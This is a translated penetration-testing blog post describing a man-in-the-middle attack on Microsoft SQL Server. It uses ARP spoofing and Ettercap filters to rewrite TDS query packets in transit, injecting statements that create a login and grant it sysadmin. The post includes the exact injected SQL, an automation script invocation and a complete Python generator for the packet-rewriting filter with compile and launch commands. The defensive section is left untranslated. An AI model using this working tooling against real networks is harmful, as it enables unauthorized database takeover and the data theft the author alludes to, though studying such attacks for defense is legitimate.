Hacking MSSQL without knowing the password


Copyright owned by original author

0x01 Preface

In a recent penetration test I happened to notice some unencrypted MSSQL traffic in a packet capture. The query syntax was right there in the clear, so there was no mistaking it. At first I thought this might be a way to capture authentication credentials. However, MSSQL encrypts the login exchange, which means I would have had to break that encryption to obtain the credentials. If MSSQL was installed with a self-signed certificate this is not hard to defeat, because the client has no way to tell the server's certificate from one a man-in-the-middle presents instead.

Unfortunately, breaking MSSQL's encryption was outside the scope of my agreement with this customer, so I had to set my curiosity aside and finish the penetration test. Still, I could not stop thinking about it. Was there a way to attack MSSQL without any credentials at all? I decided to go back to the lab to test my hypothesis.

In the end, by altering just a few packets I was able to take control of MSSQL without stealing any credentials, purely through a man-in-the-middle attack.

0x02 Man-in-the-middle

Back in the lab I set up my research environment: MSSQL Server 2014 Express running on Windows Server 2012 R2, a Windows 10 client running MSSQL Management Studio 2014, and a freshly installed Kali 2.0 as the attacker. All machines sit on the same subnet to simulate an attack from inside the network. This environment is almost identical to the customer's.

This kind of attack is a MITM. Anitian has carried out many of them, and we have considerable expertise in attacking infrastructure devices. The usual MITM approach is some form of traffic redirection. Using a technique such as ARP cache poisoning (which still works in many environments), the attacker forces the traffic between two systems to pass through the attacker's machine. This lets the attacker not only see everything the victims send, but also alter it in transit.

This is what I want to do.

0x03 Understand the data

The first thing I needed to understand was MSSQL query traffic. To make the test more interesting, I logged on to MSSQL with the sa account. sa is MSSQL's system administrator account and can do anything. If the experiment succeeded, I could use sa's privileges to do something interesting.

After logging in I opened Wireshark 2.0 on the MSSQL server and started capturing. I used the "tds.query" display filter to hide all the other traffic, leaving only the actual TDS query packets. (Incidentally, I found that older versions of Wireshark do not support the "tds.query" filter.)

While the capture was running I switched back to the workstation and ran a query against a test database I had created. The database is called testdb and has a single table named Products with two columns, ProductID and ProductName. It contains no rows, but this test does not need any data. The query simply retrieves rows from that table.

The query ran successfully and returned an empty result set; the column names are visible in the lower right. Back in Wireshark, I stopped the capture and looked at what had been recorded. I spotted a TDS query packet, and clicking on it displayed its entire contents. MSSQL Server 2014 Express does not encrypt this traffic by default, so the query was right there in plain text.

The decoded data is easy to make out in the middle pane. It even contains the carriage returns and line feeds. One interesting detail: there is a null byte (0x00) after every character. The raw bytes in the lower pane make this obvious. Wireshark renders them as periods, but they really are null bytes, because TDS carries the SQL text as UCS-2 (UTF-16LE), two bytes per character. This means I cannot simply search for the ASCII string "select"; I have to account for the null bytes when searching, and insert them into whatever data I substitute.

0x04 Ettercap filters

Now that I understood the data, I looked for a way to manipulate it. I settled on Ettercap, a tool built specifically for MITM attacks. It has a built-in feature called Ettercap filters: a filter lets me search for data in packets and then modify it. You write a filter yourself and load it into Ettercap, which then rewrites the matching data every time it sees it. The feature is somewhat limited, but it is enough for a PoC.

Filters are written in a simple scripting language. The two functions I needed are search and replace: search looks for the specified data in a packet, and replace substitutes the data we want. This is the heart of the project.

Because the SQL text in the TDS packets contains null bytes, some of the characters are non-printable, which means I cannot simply search and replace a string. I need a way to search for non-printable characters, since I cannot type a NULL byte on the keyboard. Fortunately, Ettercap filter strings accept hexadecimal escapes: to search for "s" I can search for "\x73", and a null byte is simply "\x00". Kali ships with hexdump, which prints a string as hex values, and I used it to convert "select" into hex.

Translator's note: this is really neat.

I wrote a filter to test against the data I wanted.

The first line ensures the filter only acts on TCP traffic to port 1433. When that condition is met the filter prints a debug message, so I know it has found MSSQL traffic. That is purely for my peace of mind, confirming the filter is working. The next if statement searches for the hex data, which is "select" with the null bytes in between. If the filter finds that string, it prints another debug message.

Finally, the interesting part. The replace command swaps the matched string for "ssssss", again with the null bytes. This is only to verify that the script works correctly. It is important that the replacement data be exactly the same length as the data it replaces; otherwise the TCP sequence numbers no longer line up and the connection breaks.

Compile the filter. This is very simple with the etterfilter command.

No errors were reported, so the filter can be tested. I started the Ettercap GUI, began ARP spoofing, and targeted the MSSQL server and the client workstation. I ran Wireshark to confirm that traffic between the two victims now passed through the attacker. In Ettercap I clicked "Filters -> Load a filter" and selected my filter. The Ettercap console showed "Content filters loaded", and almost immediately "SQL Traffic Discovered". Everything was going to plan.

The next step was to go back to the workstation and run the query again. If all went to plan, "select" would be replaced with "ssssss", breaking the query. I ran it, and this time, instead of the empty table, I got an error.

"Incorrect syntax near 'ssssss'." Perfect. The filter works exactly as expected: it replaced "select" with "ssssss", MSSQL could not parse the result, and it returned an error. That is the first step down the right path. The next step is to replace the entire statement with a query of our own.

0x05 Create an account

I decided to add an account on the server. This is the ideal scenario for an attacker, especially when the victim at the workstation is logged in as sa. To add an account, I need to submit the following query to MSSQL:

```sql
CREATE LOGIN anitian WITH PASSWORD='YouGotHacked1#';
```

This adds a login named "anitian" with the password "YouGotHacked1#" to MSSQL. After converting it to hex, I modified the mssql.filter file.

This filter searches for "select ProductID, ProductName from Products where ProductID=1;" and replaces it with "CREATE LOGIN anitian WITH PASSWORD='YouGotHacked1#';". I said earlier that the two strings must be the same length, so how do I make my statement fit? Because it is shorter than the original, I simply append a few spaces; trailing spaces do not affect how the statement executes (each padding space must of course be followed by its own null byte, like every other character). A statement longer than the original could not be swapped in this way. I compiled the filter and loaded it into Ettercap as before, then submitted the query from the workstation.

Notice that the result differs from what came back before Ettercap was in the path. Previously an empty table was returned; this time there is no table at all, just "Command(s) completed successfully." A DBA who saw this would most likely shrug it off as a strange glitch. Unfortunately, by then it is too late: I have already added my own login to the server. Now the real hacking begins.

From the same Windows 10 workstation where I had been logged in as sa, I now log on to the server as my newly created user "anitian".

Success! I logged in with my new account. Unfortunately it has very few privileges, so I cannot do much with it yet. Still, it is a good start. The next step is to use another Ettercap filter to raise my privileges.

At this point I could easily finish the job. But converting to hex by hand, null bytes and all, is tedious. Who wants to spend their time on that? And is that really a good PoC?

No! I was not going to give up so easily. Better still, a script could do all the tedious work for me!

0x06 Automated attacks

The SQLInject.sh shell script can be downloaded here.

This script automates the whole process, from converting the SQL statements to hex, through the ARP attack, to loading the Ettercap filter. It makes everything very simple.

The script needs the following information:

- the MSSQL server's IP address
- the MSSQL client's IP address
- the original SQL statement to be replaced
- the new SQL statement to inject in its place

Normally I know all of this except the SQL statement I want to inject. I know I want to give anitian the sysadmin role. After a quick look at the MSSQL syntax I wrote the following statement:

```sql
ALTER SERVER ROLE sysadmin ADD MEMBER anitian;
```

This gives the newly added anitian login the sysadmin role, so I can do a great deal more. With all four pieces of information in hand, I run the script:

```bash
./SQLInject.sh -o "select ProductID, ProductName from Products where ProductID=1;" -i "ALTER SERVER ROLE sysadmin ADD MEMBER anitian;" -s -c -f mssql.filter
```

With this script I no longer have to worry about the annoying hex format or the null bytes. The script does everything: it converts the strings to hex, writes an Ettercap filter to mssql.filter (the file name comes from the -f parameter), runs etterfilter to compile it, and finally launches Ettercap from the command line, loads the filter, and starts ARP spoofing the MSSQL server and the client workstation. It even compares the lengths of the two strings and pads the shorter one with spaces so they match. One command does it all.
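As an added example (this is not the article's SQLInject.sh, whose source is not on this page), the Python script below performs the steps that script is described as automating and that 0x04 and 0x05 carried out by hand: it encodes each statement the way TDS sends it (UCS-2/UTF-16LE, which is where the null bytes come from), pads the injected statement with spaces until both byte strings are the same length, and writes out the Ettercap filter source for etterfilter. The port and the filter layout follow the article; the function names, the debug messages, and the etterfilter/ettercap invocation in the closing comment are this example's own choices, with the victim addresses left as placeholders.

```python
"""Generate an Ettercap filter that rewrites a SQL statement inside a TDS
packet.  Added example, not the page's SQLInject.sh script.

Steps, mirroring the article:
  1. encode each statement as TDS carries it, UCS-2 / UTF-16LE, so every
     ASCII character is followed by a 0x00 byte;
  2. pad the injected statement with spaces until its encoded length equals
     the original's, so the TCP payload length (and sequencing) is unchanged;
  3. emit etterfilter source with the search/replace pair.
"""

MSSQL_PORT = 1433


def tds_hex(statement: str) -> str:
    """Return the statement as the \\xNN escapes etterfilter accepts,
    using the UTF-16LE bytes TDS puts on the wire."""
    return "".join(f"\\x{b:02x}" for b in statement.encode("utf-16-le"))


def can_replace(original: str, injected: str) -> bool:
    """True if the injected statement fits within the original's byte length.
    A longer statement cannot be swapped in without changing the packet."""
    return len(injected.encode("utf-16-le")) <= len(original.encode("utf-16-le"))


def pad_to_match(original: str, injected: str) -> str:
    """Pad the injected statement with trailing spaces so that its UTF-16LE
    encoding is exactly as long as the original's.  Each space adds two bytes
    (0x20 0x00), so the padding is computed on encoded lengths, not characters."""
    if not can_replace(original, injected):
        raise ValueError(
            "injected statement is longer than the original; swapping it in "
            "would change the packet length and break the TCP connection")
    orig_len = len(original.encode("utf-16-le"))
    inj_len = len(injected.encode("utf-16-le"))
    return injected + " " * ((orig_len - inj_len) // 2)


def build_filter(original: str, injected: str, port: int = MSSQL_PORT) -> str:
    """Emit etterfilter source: match TCP traffic to the MSSQL port, look for
    the original statement's bytes in the payload and replace them with the
    padded injected statement.  search() is a byte match, so the original
    must be given exactly as the client sends it (case, spacing, semicolon)."""
    search = tds_hex(original)
    replace = tds_hex(pad_to_match(original, injected))
    assert len(search) == len(replace)  # same packet length, by construction
    return (
        f"if (ip.proto == TCP && tcp.dst == {port}) {{\n"
        f'    msg("SQL Traffic Discovered\\n");\n'
        f'    if (search(DATA.data, "{search}")) {{\n'
        f'        msg("Original query found, replacing it\\n");\n'
        f'        replace("{search}", "{replace}");\n'
        f"    }}\n"
        f"}}\n"
    )


if __name__ == "__main__":
    # Sample input: the two statements used in the article.
    original_sql = "select ProductID, ProductName from Products where ProductID=1;"
    injected_sql = "ALTER SERVER ROLE sysadmin ADD MEMBER anitian;"
    source = build_filter(original_sql, injected_sql)
    with open("mssql.filter", "w") as fh:
        fh.write(source)
    print(source)
    # Compile and load it as the article does with its hand-written filter
    # (victim addresses are placeholders; see ettercap(8) for target syntax):
    #   etterfilter mssql.filter -o mssql.ef
    #   ettercap -T -q -F mssql.ef -M arp <server target> <client target>
```

Two things the article's narrative implies but does not spell out: the search only succeeds when the whole statement sits inside one TCP segment, which holds for short ad-hoc queries but not for large batches, and the byte match is exact, so any difference in case or whitespace between the captured query and the one supplied here means nothing is replaced.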

I ran the script and switched to the workstation. When I ran the same select query, I once again saw "Command(s) completed successfully". A good sign. I logged out of sa and logged in as anitian.

Ha! As you can see, anitian now has the sysadmin role. With it I can access the whole system, and it gives me an excellent pivot point for attacking other systems on the network. That is assuming, of course, that this database does not already hold the payment card numbers or personal data I am after.

The biggest limitation of this script is that you need to know the original statement you want to replace. Fortunately, MSSQL servers commonly run scheduled batch jobs and queries, so watching Wireshark for a while will catch at least one. Of course, this could grow into a more complete solution: run the MITM so that I proxy all the traffic, search it for TDS packets, and replace the data automatically without knowing any original statement in advance. That project is for another day.

0x07 Defending against SQL MITM attacks

Translator's note: I have not translated this section; please read the original article. :D
